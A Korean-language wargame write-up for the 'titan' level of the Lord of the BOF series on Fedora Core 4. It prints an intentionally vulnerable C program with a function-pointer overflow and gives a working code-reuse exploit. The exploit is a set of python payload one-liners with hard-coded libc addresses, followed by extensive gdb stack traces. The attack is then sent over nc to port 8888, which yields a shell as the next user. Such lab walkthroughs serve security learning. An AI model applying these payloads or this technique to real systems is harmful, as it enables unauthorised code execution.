[Fedora4] enigma -> titan

/*

        The Lord of the BOF : The Fellowship of the BOF

        - titan

        - Remote BOF on Fedora Core 4

        - hint : ? 

- port : TCP 8888

*/

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <unistd.h>

static char buffer[40];

static void (*ftn)();

void print()

{

        printf("nothing here\n");

fflush(stdout);

}

int main()

{

        char buf[48];

        ftn = print;

        printf("titan : What a tragic mistake.\n");

        printf("you : ");

        fflush(stdout);

// give me a food

        fgets(buf,48,stdin);

// buffer overflow!!

        strcpy(buffer,buf);

// preventing RTL

        if(((int)ftn & 0xff000000) == 0)

        {

                printf("I've an allergy to NULL");

                exit(1);

        }

// clearing buffer

memset(buffer, 0, 40);

        ftn();

}

소스코드를 살펴보면 지역변수 buf에 fgets함수를 이용하여 값을 입력한다.

그리고 strcpy함수로 전역변수 buffer에 복사하는데 이 때 오버플로우가 발생한다.

또 조건이 있는데 ftn함수는 라이브러리함수의 주소를 오버라이팅 시키면 안됨.

그 후 memset함수를 이용하여 전역변수 buffer를 40바이트 클리어 시켜준 후 ftn()를 호출한다.

여기서 오버플로우로 인해 ftn함수의 주소를 조작할 수 있다.

초기화 되지 않은 전역변수는 .bss영역에 있기 때문에 오버플로우가 제대로 됬는지 확인해보자.

(python -c 'print "A"*48';cat) | (python -c 'print "r"';cat) | (python -c 'print "b* main+171"';cat) | gdb -q 3itan 

<memset 한 후 .bss영역>

현재 할 수 있는 것은 전역변수를 오버플로우 시켜서 ftn함수의 주소를 바꾸는 것 뿐이다.

그 마저도 라이브러리함수를 사용하지 못하기 때문에 RTL 공격을 못한다.

도저히 어떻게 해야할지 모르겠어서 write up을 보았더니 

code reuse attack 을 이용하여 공략했다. code reuse attack은 해당 프로그램의 TEXT영역의 코드를 이용하여 프로그램의

흐름을 조작해 원하는 결과를 얻는 공격 방식이다.

ftn() 의 주소를 0x0804854a로 오버라이팅을 시켜서 흐름을 바꿔주었다.

그로인해 esp는 더 높은주소 방향을 향해 이동한다.

그리하여 다음과 같은 공격이 가능해진다.

[enigma@Fedora_2ndFloor ~]$ (python -c 'print "B"*8+"\xe7\xb0\x7d\x00"+"BBBB"+"\x87\xd9\x8b\x00"';cat)|(python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) |(python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | (python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | (python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) > aa

[enigma@Fedora_2ndFloor ~]$ gdb -q 3itan 

(no debugging symbols found)

Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) b* main+88

Breakpoint 1 at 0x804854d

(gdb) disp/5i $eip

(gdb) disp/28wx $esp

(gdb) r<aa

Starting program: /home/enigma/3itan <aa

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0xbc1000

(no debugging symbols found)

(no debugging symbols found)

titan : What a tragic mistake.

you : 

Breakpoint 1, 0x0804854d in main ()

2: x/28xw $esp

0xbffd0150: 0x00000000 0x00000000 0xbffd1c23 0x08048456

0xbffd0160: 0x00000000 0x080497a8 0xbffd0178 0x08048395

0xbffd0170: 0x008caff4 0x008cc360 0xbffd0198 0x080485de

0xbffd0180: 0x008caff4 0x00000001 0x00000000 0x008caff4

0xbffd0190: 0x007a2ca0 0x080485c4 0xbffd01f8 0x007bad7f

0xbffd01a0: 0x00000001 0xbffd0224 0xbffd022c 0xbffd01e0

0xbffd01b0: 0x00795898 0x007a3878 0xb7fd2690 0x00000001

1: x/5i $eip

0x804854d <main+88>: mov    0x80497e4,%eax

0x8048552 <main+93>: sub    $0x4,%esp

0x8048555 <main+96>: push   %eax

0x8048556 <main+97>: push   $0x30

0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax

(gdb) c

Continuing.

Breakpoint 1, 0x0804854d in main ()

2: x/28xw $esp

0xbffd015c: 0x08048456 0x00000000 0x41414141 0x41414141

0xbffd016c: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd017c: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd018c: 0x0804854a 0x007a000a 0x080485c4 0xbffd01f8

0xbffd019c: 0x007bad7f 0x00000001 0xbffd0224 0xbffd022c

0xbffd01ac: 0xbffd01e0 0x00795898 0x007a3878 0xb7fd2690

0xbffd01bc: 0x00000001 0x008caff4 0x007a2ca0 0x080485c4

1: x/5i $eip

0x804854d <main+88>: mov    0x80497e4,%eax

0x8048552 <main+93>: sub    $0x4,%esp

0x8048555 <main+96>: push   %eax

0x8048556 <main+97>: push   $0x30

0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax

(gdb) b* fgets+242  // fgets함수 ret부분

Breakpoint 2 at 0x7fb272

(gdb) c

Continuing.

Breakpoint 2, 0x007fb272 in fgets () from /lib/libc.so.6

2: x/28xw $esp

0xbffd0148: 0x08048561 0xbffd0164 0x00000030 0x008cb740

0xbffd0158: 0xbffd1c23 0x08048456 0x00000000 0x41414141

0xbffd0168: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd0178: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd0188: 0x41414141 0x0804854a 0x007a000a 0x080485c4

0xbffd0198: 0xbffd01f8 0x007bad7f 0x00000001 0xbffd0224

0xbffd01a8: 0xbffd022c 0xbffd01e0 0x00795898 0x007a3878

1: x/5i $eip

0x7fb272 <fgets+242>: ret    

0x7fb273 <fgets+243>: mov    (%edi),%edx

0x7fb275 <fgets+245>: test   $0x20,%dl

0x7fb278 <fgets+248>: jne    0x7fb2a6 <fgets+294>

0x7fb27a <fgets+250>: movb   $0x0,(%esi,%ecx,1)

(gdb) c

Continuing.

Breakpoint 1, 0x0804854d in main ()

2: x/28xw $esp

0xbffd0168: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd0178: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd0188: 0x41414141 0x0804854a 0x007a000a 0x080485c4

0xbffd0198: 0xbffd01f8 0x007bad7f 0x00000001 0xbffd0224

0xbffd01a8: 0xbffd022c 0xbffd01e0 0x00795898 0x007a3878

0xbffd01b8: 0xb7fd2690 0x00000001 0x008caff4 0x007a2ca0

0xbffd01c8: 0x080485c4 0xbffd01f8 0xbffd01a0 0x007bad44

1: x/5i $eip

0x804854d <main+88>: mov    0x80497e4,%eax

0x8048552 <main+93>: sub    $0x4,%esp

0x8048555 <main+96>: push   %eax

0x8048556 <main+97>: push   $0x30

0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax

(gdb) c

Continuing.

Breakpoint 2, 0x007fb272 in fgets () from /lib/libc.so.6

2: x/28xw $esp

0xbffd0154: 0x08048561 0xbffd0164 0x00000030 0x008cb740

0xbffd0164: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd0174: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd0184: 0x41414141 0x41414141 0x0804854a 0x007a000a

0xbffd0194: 0x080485c4 0xbffd01f8 0x007bad7f 0x00000001

0xbffd01a4: 0xbffd0224 0xbffd022c 0xbffd01e0 0x00795898

0xbffd01b4: 0x007a3878 0xb7fd2690 0x00000001 0x008caff4

1: x/5i $eip

0x7fb272 <fgets+242>: ret    

0x7fb273 <fgets+243>: mov    (%edi),%edx

0x7fb275 <fgets+245>: test   $0x20,%dl

0x7fb278 <fgets+248>: jne    0x7fb2a6 <fgets+294>

0x7fb27a <fgets+250>: movb   $0x0,(%esi,%ecx,1)

(gdb) c

Continuing.

Breakpoint 1, 0x0804854d in main ()

2: x/28xw $esp

0xbffd0174: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd0184: 0x41414141 0x41414141 0x0804854a 0x007a000a

0xbffd0194: 0x080485c4 0xbffd01f8 0x007bad7f 0x00000001

0xbffd01a4: 0xbffd0224 0xbffd022c 0xbffd01e0 0x00795898

0xbffd01b4: 0x007a3878 0xb7fd2690 0x00000001 0x008caff4

0xbffd01c4: 0x007a2ca0 0x080485c4 0xbffd01f8 0xbffd01a0

0xbffd01d4: 0x007bad44 0x00000000 0x00000000 0x00000000

1: x/5i $eip

0x804854d <main+88>: mov    0x80497e4,%eax

0x8048552 <main+93>: sub    $0x4,%esp

0x8048555 <main+96>: push   %eax

0x8048556 <main+97>: push   $0x30

0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax

(gdb) c

Continuing.

Breakpoint 2, 0x007fb272 in fgets () from /lib/libc.so.6

2: x/28xw $esp

0xbffd0160: 0x08048561 0x41414141 0x41414141 0x41414141

0xbffd0170: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd0180: 0x41414141 0x41414141 0x41414141 0x0804854a

0xbffd0190: 0x007a000a 0x080485c4 0xbffd01f8 0x007bad7f

0xbffd01a0: 0x00000001 0xbffd0224 0xbffd022c 0xbffd01e0

0xbffd01b0: 0x00795898 0x007a3878 0xb7fd2690 0x00000001

0xbffd01c0: 0x008caff4 0x007a2ca0 0x080485c4 0xbffd01f8

1: x/5i $eip

0x7fb272 <fgets+242>: ret    

0x7fb273 <fgets+243>: mov    (%edi),%edx

0x7fb275 <fgets+245>: test   $0x20,%dl

0x7fb278 <fgets+248>: jne    0x7fb2a6 <fgets+294>

0x7fb27a <fgets+250>: movb   $0x0,(%esi,%ecx,1)

(gdb) c

Continuing.

Breakpoint 1, 0x0804854d in main ()

2: x/28xw $esp

0xbffd0180: 0x41414141 0x41414141 0x41414141 0x0804854a

0xbffd0190: 0x007a000a 0x080485c4 0xbffd01f8 0x007bad7f

0xbffd01a0: 0x00000001 0xbffd0224 0xbffd022c 0xbffd01e0

0xbffd01b0: 0x00795898 0x007a3878 0xb7fd2690 0x00000001

0xbffd01c0: 0x008caff4 0x007a2ca0 0x080485c4 0xbffd01f8

0xbffd01d0: 0xbffd01a0 0x007bad44 0x00000000 0x00000000

0xbffd01e0: 0x00000000 0x0079ae60 0x0079613d 0x007a2fb4

1: x/5i $eip

0x804854d <main+88>: mov    0x80497e4,%eax

0x8048552 <main+93>: sub    $0x4,%esp

0x8048555 <main+96>: push   %eax

0x8048556 <main+97>: push   $0x30

0x8048558 <main+99>: lea    0xffffffcc(%ebp),%eax

(gdb) c

Continuing.

Breakpoint 2, 0x007fb272 in fgets () from /lib/libc.so.6

2: x/28xw $esp

0xbffd016c: 0x007db0e7 0x42424242 0x008bd987 0x008c000a

0xbffd017c: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffd018c: 0x0804854a 0x007a000a 0x080485c4 0xbffd01f8

0xbffd019c: 0x007bad7f 0x00000001 0xbffd0224 0xbffd022c

0xbffd01ac: 0xbffd01e0 0x00795898 0x007a3878 0xb7fd2690

0xbffd01bc: 0x00000001 0x008caff4 0x007a2ca0 0x080485c4

0xbffd01cc: 0xbffd01f8 0xbffd01a0 0x007bad44 0x00000000

1: x/5i $eip

0x7fb272 <fgets+242>: ret    // fgets함수의 ret과 main함수의 buf영역과 겹친다. 그래서 그 부분을 system함수 주소를 덮어씌워 공격함.

0x7fb273 <fgets+243>: mov    (%edi),%edx

0x7fb275 <fgets+245>: test   $0x20,%dl

0x7fb278 <fgets+248>: jne    0x7fb2a6 <fgets+294>

0x7fb27a <fgets+250>: movb   $0x0,(%esi,%ecx,1)

(gdb) x/i 0x007db0e7

0x7db0e7 <system>: push   %edi

The program is running.  Exit anyway? (y or n) y

[enigma@Fedora_2ndFloor ~]$ (python -c 'print "B"*8+"\xe7\xb0\x7d\x00"+"BBBB"+"\x87\xd9\x8b\x00"';cat)|(python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) |(python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | (python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | (python -c 'print "A"*40 + "\x4a\x85\x04\x08"';cat) | nc localhost 8888

titan : What a tragic mistake.

you : id

uid=503(titan) gid=503(titan) context=system_u:system_r:inetd_t

my-pass

euid = 503

out of the night

[titan@Fedora_2ndFloor ~]$ cat dropped_item.txt 

                   ,.

                 ,'  `.

               ,' _<>_ `.

             ,'.-'____`-.`.

           ,'_.-''    ``-._`.

         ,','      /\      `.`.

       ,' /.._  O /  \ O  _.,\ `.

     ,'/ /  \ ``-;.--.:-'' /  \ \`.

   ,' : :    \  /\`.,'/\  /    : : `.

  < <>| |   O >(< (  ) >)< O   | |<> >

   `. : :    /  \/,'`.\/  \    ; ; ,'

     `.\ \  /_..-:`--';-.._\  / /,'

       `. \`'   O \  / O   `'/ ,'

         `.`._     \/     _,','

           `..``-.____.-'',,'

             `.`-.____.-','

               `.  <>  ,'

                 `.  ,' 

                   `'

ps. 풀기전에 너무 헤맸다.. 다 풀고보니까 안 어려워 보이지만 풀기까지 엄청 삽질했다..